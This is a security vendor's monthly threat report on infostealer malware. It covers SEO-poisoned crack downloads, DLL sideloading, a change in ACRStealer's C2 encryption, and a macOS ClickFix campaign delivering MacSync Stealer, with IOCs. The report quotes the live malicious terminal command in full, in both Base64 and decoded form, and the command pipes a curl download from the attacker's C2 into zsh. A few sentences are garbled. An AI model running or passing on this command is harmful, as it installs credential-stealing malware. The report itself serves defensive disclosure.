January 2026 Infostealer Trend Report
This report provides statistics, trends, and case information regarding the distribution quantity, distribution methods, and obfuscation techniques of Infostealer malware collected and analyzed during the month of January 2026. Below is a summary of the original report content.
1) Data Sources and Collection Methods
AhnLab Security Intelligence Center (ASEC) operates various systems that can automatically collect malware currently being distributed in order to proactively respond to Infostealer malware. The collected malware is analyzed for its maliciousness and C2 information through an automated analysis system. Relevant information is provided in real-time via the ATIP IOC service and can also be checked on the related information page of the ATIP file analysis information.
- AhnLab’s self-built system
- Crack Concealment Malware Automatic Collection System
- Email Honeypot System
- Malware C2 Automated Analysis System
ATIP Real-time IOC Service
C2 and Malware Type Analysis Information
- File Analysis Information – Related Information – Contacted URLs
The statistics in this report are suggested to be used for confirming the trends of the distribution quantity of overall Infostealer malware, camouflage techniques, distribution methods.
2) Crack camouflage distribution Infostealer
This is a statistic regarding information theft malware disguised as illegal programs such as Crack and Keygen. It is distributed using a strategy (SEO Poisoning) that ensures malware distribution posts appear prominently in search engine results. AhnLab Security Intelligence Center (ASEC) has established a system to automatically collect malware distributed in this manner and analyze C2 information, enabling real-time blocking of malware C2, and provides related information through ATIP. In January, LummaC2, Vidar, and ACRStealer Infostealer were primarily distributed.
Figure 1. Malware Distribution Page
The quantity of malware distributed in this manner over the past year is shown in the following chart. The second legend indicates the quantity of malware that did not have relevant information on VirusTotal at the time of collection, meaning that AhnLab collected this malware more quickly. It can be seen that the majority of the malware was first collected and addressed through the automated collection system.
Chart 1. Annual Malware Distribution Quantity
Previously, attackers wrote malware distribution posts directly on blogs they created, but, search engines have begun to take measures to prevent these malicious blogs from appearing in search results. Attackers are now distributing malware by writing posts on legitimate sites to bypass this. They utilize popular forums or Q&A pages of specific companies, bulletin boards, comments, etc., and, the figure below is an example of malware distribution posts uploaded to various sites. Posts uploaded in this manner are displayed at the top of search engine results, allowing many users to visit. Recently, there has been an increase in cases where attackers target poorly managed WordPress sites to create distribution posts.
Figure 2. Distribution Posts Posted in the Community
Figure 3. Distribution Posts Posted on Corporate Websites
As shown above, the execution types of Infostealers that are distributed include those distributed in EXE format, as well as those that utilize the DLL SideLoading technique, where a normal EXE file and a malicious DLL file are placed in the same folder, causing the malicious DLL file to be loaded when the normal EXE file is executed. During the month of January, the malware that occurred consisted of approximately 70.8% in EXE type and approximately 29.2% in DLL Sideloading type, with a slight decrease in the proportion of DLL Sideloading compared to the previous month. Malware of the DLL SideLoading type is created by modifying only a portion of the original normal DLL to include malicious code, so there is not much visual difference from the original, leading to many cases where other security products classify it as a normal file, thus requiring caution.
In a Windows environment, Infostealers of the type mentioned above are distributed, but when accessing the distribution page in a macOS environment, macOS Infostealers are distributed. In macOS distribution, the ClickFix technique is primarily used to induce execution through the terminal by copying malicious commands, or it prompts the download and execution of malicious Bash scripts to distribute the Infostealer. The Infostealers that are ultimately executed are mainly distributed in the form of Fatbin executable file types or types implemented with osascript. Unlike Windows distribution, they exhibit a very rapid sample variation rate. Although they have the same functionality, the hash values of the malware change on a minute or hourly basis.
Figure 4. Example of a macOS Infostealer distribution page
The recent collection status of macOS Infostealers over the past 6 months is as follows: In . month, 1 Bash scripts 268 were collected, , Fatbin executable files 12 were collected, and , C2 domains 27 were collected. .
Chart 2. mac Infostealer collection statistics
Trends #1
– Occurrence of ACRStealer variants
1. At the end of January, a significant modification occurred in the C2 communication functionality of ACRStealer. Previously, when encrypting C2 transmission and reception data, a hardcoded key within the malware and the AES algorithm were used; however, starting from the end of January, the malware being distributed utilizes the ECDH and ChaCha20-Poly1305 algorithms. To facilitate this, a public key exchange process between the parties has been added during the C2 connection process.
When executing the malware, a key pair is generated using the SECP256R1 curve, and the public key is sent to C2. . At this time, C2 responds with its own public key. . Subsequently, the malware combines the public key responded by C2 with its own private key to generate a shared secret, , which is used as the encryption key. . During communication with C2, encrypted data is exchanged using this key and the ChaCha20-Poly1305 algorithm. .
The PEB data is used as a seed value in the key pair generation process of the malware. . Therefore, different keys are generated each time it is executed, even in the same environment. . As a result, C2 must accurately identify the execution session to decrypt the data. . To facilitate this, it appears that the “X-Requests-Key” header has been added. . The value of this header is issued by C2 during the key exchange process, and , subsequently, the malware includes this header information when connecting to C2. .
Figure 5. C2 header generation code ( Left : Original Right : Variant )
-
Hash
7a5c704e85df3dec08c9ab17857c4ac1
3337c23f43616d2736653963de7f91f2 -
C2
hxxps://146.103.102[.]11
hxxps://94.103.95[.]97
Trends #2
– macOS Distribution Infostealer
This trend report will now include information on macOS Infostealer trends, and we would like to introduce a case related to the distribution of MacSync Stealer. During the distribution process of the Infostealer, the browser’s User-Agent is checked, and if macOS usage is confirmed, the user is redirected to a page that distributes the macOS Infostealer. This page is disguised as GitHub and is designed to encourage users to copy the content from the input box and paste it into the terminal for execution.
Figure 6. macOS Infostealer Distribution Page
The content of the malicious command is as follows,: it downloads a legitimate DMG file for disguise and executes a Base64 encoded command using zsh.. As a result, it issues a command to download and execute additional script files from C2..
| Original Command |
|---|
| echo “GitHub-AppInstaller: https://dl.github[.]com/drive-file-stream/GitHubApplicationSetup.dmg” && echo ‘ZWNobyAnSW5zdGFsbGluZyBwYWNrYWdlcyBwbGVhc2Ugd2FpdC4uLicgJiYgY3VybCAta2ZzU0wgaHR0cDovL3Nlc3RyYWluaW5nLmNvbS9jdXJsLzBiYTQ0ZDY0OTYzNzY1ZmI2NGRiNmE4ZjJmODBkZWViODczNWIyNGFiOTg4ZWZmMjI2NjhhMzhiZTgxZWI0YmV8enNo’|base64 -D|zsh |
| Decoding Command |
|---|
| echo ‘Installing packages please wait…’ && curl -kfsSL http://sestraining[.]com/curl/0ba44d64963765fb64db6a8f2f80deeb8735b24ab988eff22668a38be81eb4be|zsh |
The downloaded script file consists of a command that decompresses Base64 encoded data using gzip and then executes it.. The final script that is executed is as follows..
Figure 7. Macsync Stealer Downloader
The script connects to C2, downloads and executes an osascript file, and then sends the resulting file back to C2. The osascript executed is MacSync Stealer, which collects critical information from the system and generates a compressed file at the path “/tmp/osalogging.zip.” The collected information is sent to C2 by the script that executed it. When connecting to C2, the token value and api_key value are used, and if the values are invalid, C2 will not function.
- C2 domain: sestraining.com
- hash
73600d113646a95d2e459dd940c18e1e (script)
74e17b926dc6cc5ab247aa0e059916c1 (decoding script)
4aab18983ab8c00f3c619b75033ce548 (MacSync Stealer)
The explanation of statistics not mentioned in this summary, includes statistics on the target companies used for malware production, original file name statistics,, distribution statistics,, product detection quantity statistics,, and detailed information related to Infostealer from phishing emails can be found in the original ATIP report..
※ Please refer to the attached file for more details.
